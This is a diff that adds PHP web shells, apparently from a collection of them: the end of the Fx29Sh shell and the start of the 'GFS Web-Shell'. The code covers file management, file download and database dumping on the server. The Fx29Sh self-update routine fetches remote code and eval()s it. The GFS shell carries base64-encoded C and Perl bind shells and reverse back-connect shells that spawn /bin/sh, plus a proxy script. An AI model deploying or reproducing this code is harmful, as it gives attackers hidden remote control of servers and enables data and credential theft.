+  $statinfo = array();
+  foreach ($arrfunc as $func) {
+    if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
+    else { $statinfo[] = showstat($func[0],"off"); }
+  }
+  $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
+  foreach ($arrcmd as $cmd) {
+    if (fx29exec2($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
+    else { $statinfo[] = showstat($cmd[0],"off"); }
+  }
+  return implode(" ",$statinfo);
+}
+function showdisfunc() {
+  if ($disablefunc = @ini_get("disable_functions")) {
+    return "<font color=#FF9900><b>".$disablefunc."</b></font>";
+  }
+  else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
+}
+function disp_drives($curdir,$surl) {
+  $letters = "";
+  $v = explode("\\",$curdir);
+  $v = $v[0];
+  foreach (range("A","Z") as $letter) {
+    $bool = $isdiskette = $letter == "A";
+    if (!$bool) { $bool = is_dir($letter.":\\"); }
+    if ($bool) {
+      $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".
+                  ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly!')\"":"")."> ";
+      if ($letter.":" != $v) { $letters .= $letter; }
+      else { $letters .= "<font color=yellow>".$letter."</font>"; }
+      $letters .= "</a> ";
+    }
+  }
+  if (!empty($letters)) { Return $letters; }
+  else  {Return "None"; }
+}
+function disp_freespace($curdrv) {
+  $free = @disk_free_space($curdrv);
+  $total = @disk_total_space($curdrv);
+  if ($free === FALSE) { $free = 0; }
+  if ($total === FALSE) { $total = 0; }
+  if ($free < 0) { $free = 0; }
+  if ($total < 0) { $total = 0; }
+  $used = $total-$free;
+  $free_percent = round(100/($total/$free),2)."%";
+  $free = view_size($free);
+  $total = view_size($total);
+  return "$free of $total ($free_percent)";
+}
+## Fx29Sh UPDATE FUNCTIONS ##
+function fx29getsource($fn) {
+  global $fx29sh_sourcesurl;
+  $array = array(
+    "fx29sh.php" => "fx29sh.txt",
+  );
+  $name = $array[$fn];
+  if ($name) {return file_get_contents($fx29sh_sourcesurl.$name);}
+  else {return FALSE;}
+}
+function fx29sh_getupdate($update = TRUE) {
+  $url = $GLOBALS["fx29sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["sh_ver"]))."&updatenow=".($updatenow?"1":"0");
+  $data = @file_get_contents($url);
+  if (!$data) { return "Can't connect to update-server!"; }
+  else {
+    $data = ltrim($data);
+    $string = substr($data,3,ord($data{2}));
+    if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
+    if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
+    if ($data{0} == "\x99" and $data{1} == "\x03") {
+      $string = explode("|",$string);
+      if ($update) {
+        $confvars = array();
+        $sourceurl = $string[0];
+        $source = file_get_contents($sourceurl);
+        if (!$source) {return "Can't fetch update!";}
+        else {
+          $fp = fopen(__FILE__,"w");
+          if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download fx29shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
+          else {
+            fwrite($fp,$source);
+            fclose($fp);
+            return "Update completed!";
+          }
+        }
+      }
+      else {return "New version are available: ".$string[1];}
+    }
+    elseif ($data{0} == "\x99" and $data{1} == "\x04") {
+      eval($string);
+      return 1;
+    }
+    else {return "Error in protocol: segmentation failed! (".$data.") ";}
+  }
+}
+function fx29_buff_prepare() {
+  global $sess_data;
+  global $act;
+  foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+  $sess_data["copy"] = array_unique($sess_data["copy"]);
+  $sess_data["cut"] = array_unique($sess_data["cut"]);
+  sort($sess_data["copy"]);
+  sort($sess_data["cut"]);
+  if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+  else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+function fx29_sess_put($data) {
+  global $sess_cookie;
+  global $sess_data;
+  fx29_buff_prepare();
+  $sess_data = $data;
+  $data = serialize($data);
+  setcookie($sess_cookie,$data);
+}
+## END Fx29Sh UPDATE FUNCTIONS ##
+## FILESYSTEM FUNCTIONS ##
+function fs_copy_dir($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      if (!$ret) {return $ret;}
+    }
+  }
+  closedir($h);
+  return TRUE;
+}
+function fs_copy_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_copy_dir($d,$t);
+  }
+  elseif (is_file($d)) { return copy($d,$t); }
+  else { return FALSE; }
+}
+function fs_move_dir($d,$t) {
+  $h = opendir($d);
+  if (!is_dir($t)) {mkdir($t);}
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      $ret = TRUE;
+      if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+      else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+      if (!$ret) {return $ret;}
+     }
+   }
+  closedir($h);
+  return TRUE;
+}
+function fs_move_obj($d,$t) {
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+  if (is_dir($d)) {
+    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+    return fs_move_dir($d,$t);
+  }
+  elseif (is_file($d)) {
+    if(copy($d,$t)) {return unlink($d);}
+    else {unlink($t); return FALSE;}
+  }
+  else {return FALSE;}
+}
+function fs_rmdir($d) {
+  $h = opendir($d);
+  while (($o = readdir($h)) !== FALSE) {
+    if (($o != ".") and ($o != "..")) {
+      if (!is_dir($d.$o)) {unlink($d.$o);}
+      else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+    }
+  }
+  closedir($h);
+  rmdir($d);
+  return !is_dir($d);
+}
+function fs_rmobj($o) {
+  $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+  if (is_dir($o)) {
+    if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+    return fs_rmdir($o);
+  }
+  elseif (is_file($o)) {return unlink($o);}
+  else {return FALSE;}
+}
+## END FILESYSTEM FUNCTIONS ##
+function onphpshutdown() {
+  global $gzipencode,$ft;
+  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
+    $v = @ob_get_contents();
+    @ob_end_clean();
+    @ob_start("ob_gzHandler");
+    echo $v;
+    @ob_end_flush();
+  }
+}
+function fx29shexit() { onphpshutdown(); exit; }
+
+function fx29fsearch($d) {
+  global $found, $found_d, $found_f, $search_i_f, $search_i_d, $a;
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $h = opendir($d);
+  while (($f = readdir($h)) !== FALSE) {
+    if($f != "." && $f != "..") {
+      $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+      if (is_dir($d.$f)) {
+        $search_i_d++;
+        if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+        if (!is_link($d.$f)) {fx29fsearch($d.$f);}
+      }
+      else {
+        $search_i_f++;
+        if ($bool) {
+          if (!empty($a["text"])) {
+            $r = @file_get_contents($d.$f);
+            if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+            if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+            if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+            else {$bool = strpos(" ".$r,$a["text"],1);}
+            if ($a["text_not"]) {$bool = !$bool;}
+            if ($bool) {$found[] = $d.$f; $found_f++;}
+          }
+          else {$found[] = $d.$f; $found_f++;}
+        }
+      }
+    }
+  }
+  closedir($h);
+}
+function view_size($size) {
+  if (!is_numeric($size)) { return FALSE; }
+  else {
+    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+    else {$size = $size . " B";}
+    return $size;
+  }
+}
+function tabsort($a,$b) { global $v; return strnatcmp($a[$v], $b[$v]);}
+function view_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$type = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+  else {$type = "?";}
+  $owner["read"] = ($mode & 00400)?"r":"-";
+  $owner["write"] = ($mode & 00200)?"w":"-";
+  $owner["execute"] = ($mode & 00100)?"x":"-";
+  $group["read"] = ($mode & 00040)?"r":"-";
+  $group["write"] = ($mode & 00020)?"w":"-";
+  $group["execute"] = ($mode & 00010)?"x":"-";
+  $world["read"] = ($mode & 00004)?"r":"-";
+  $world["write"] = ($mode & 00002)? "w":"-";
+  $world["execute"] = ($mode & 00001)?"x":"-";
+  if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+  if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+  if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+  return $type.join("",$owner).join("",$group).join("",$world);
+}
+function parse_perms($mode) {
+  if (($mode & 0xC000) === 0xC000) {$t = "s";}
+  elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+  elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+  elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+  elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+  elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+  elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+  else {$t = "?";}
+  $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+  $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+  $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+  return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+function parsesort($sort) {
+  $one = intval($sort);
+  $second = substr($sort,-1);
+  if ($second != "d") {$second = "a";}
+  return array($one,$second);
+}
+function view_perms_color($o) {
+  if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+  elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+  else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+function str2mini($content,$len) {
+  if (strlen($content) > $len) {
+    $len = ceil($len/2) - 2;
+    return substr($content, 0,$len)."...".substr($content,-$len);
+  } else {return $content;}
+}
+function strips(&$arr,$k="") {
+  if (is_array($arr)) { foreach($arr as $k=>$v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } }
+  else { $arr = stripslashes($arr); }
+}
+
+function getmicrotime() {
+  list($usec, $sec) = explode(" ", microtime());
+  return ((float)$usec + (float)$sec);
+}
+
+function milw0rm() {
+  $Lversion = php_uname(r);
+  $OSV = php_uname(s);
+  if(eregi("Linux",$OSV)) {
+    $Lversion = substr($Lversion,0,6);
+    return "http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
+  } else {
+    $Lversion = substr($Lversion,0,3);
+    return "http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
+  }
+}
+function tools() {
+  echo "List of tools";
+}
+
+function sh_name() { return base64_decode("RmFUYUxpc1RpQ3pfRnggRngyOVNoZUxMIHY=").sh_ver; }
+function htmlhead($safemode) {
+$style = '
+<style type="text/css">
+body,table {font:8pt verdana;background-color:black;}
+table {width:100%;}
+table,td,#maininfo td {padding:3px;}
+table,td,input,select,option {border:1px solid #808080;}
+body,table,input,select,option {color:#FFFFFF;}
+a {color:lightblue;text-decoration:none; } a:link {color:#5B5BFF;} a:hover {text-decoration:underline;} a:visited {color:#99CCFF;}
+textarea {color:#dedbde;font:8pt Courier New;border:1px solid #666666;margin:2;}
+#pagebar {padding:5px;border:3px solid #1E1E1E;border-collapse:collapse;}
+#pagebar td {vertical-align:top;}
+#pagebar,#pagebar p,.info,input,select,option {font:8pt tahoma;}
+#pagebar a {font-weight:bold;color:#00FF00;}
+#pagebar a:visited {color:#00CE00;}
+#mainmenu {text-align:center;}
+#mainmenu a {text-align: center;padding: 0px 5px 0px 5px;}
+#maininfo,.barheader,.bartitle {text-align:center;}
+.fleft {float:left;text-align:left;}
+.fright {float:right;text-align:right;}
+.bartitle {padding:5px;border:2px solid #1F1F1F;}
+.barheader {font-weight:bold;padding:5px;}
+.info,.info td,.info th {margin:0;padding:0;border-collapse:collapse;}
+.info th {color:#00FF00;text-align:left;width:13%;}
+.contents,.explorer {border-collapse:collapse;}
+.contents,.explorer td,th {vertical-align:top;}
+.mainpanel {border-collapse:collapse;padding:5px;}
+.barheader,.mainpanel table,td {border:1px solid #333333;}
+input[type="submit"],input[type="button"] {border:1px solid #000000;}
+input[type="text"] {padding:3px;}
+.shell {background-color:#000000;color:#00FF00;padding:5px;font-size:12;}
+.fxerrmsg {color:red; font-weight:bold;}
+#pagebar,#pagebar p,h1,h2,h3,h4,form {margin:0;}
+#pagebar,.mainpanel,input[type="submit"],input[type="button"] {background-color:#4A4A4A;}
+.bartitle,input,select,option,input[type="submit"]:hover,input[type="button"]:hover {background-color:#333333;}
+textarea,#pagebar input[type="text"],.mainpanel input[type="text"],input[type="file"],select,option {background-color:#000000;}
+input[type="label"] { text-align:right;}
+.info,.info td,input[type="label"] {border:0;background:none;}
+</style>
+';
+$html_start = '
+<html><head>
+<title>'.getenv("HTTP_HOST").' - '.sh_name().'</title>
+'.$style.'
+</head>
+<body>
+<div class=bartitle><h4>'.sh_name().'</h4>.: No System is Perfectly Safe :.</div>
+';
+return $html_start;
+};
+function footer() {
+  echo "<div class=bartitle colspan=2><font size=1 color=#00FF00> By FaTaLisTiCz_Fx, © 2008 FeeLCoMz Community, Generated: ".round(getmicrotime()-starttime,4)." seconds</font></div>";
+}
+chdir($lastdir); fx29shexit();
+?>
\ No newline at end of file
diff --git a/php/GFS Web-Shell.php b/php/GFS Web-Shell.php
new file mode 100644
index 0000000..f13c8b7
--- /dev/null
+++ b/php/GFS Web-Shell.php	
@@ -0,0 +1,1575 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåğåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ğåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèğîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
+MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
+gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
+ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
+mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
+LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
+$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
+X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
+TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
+FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
+W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
+Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
+lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
+BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
+VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
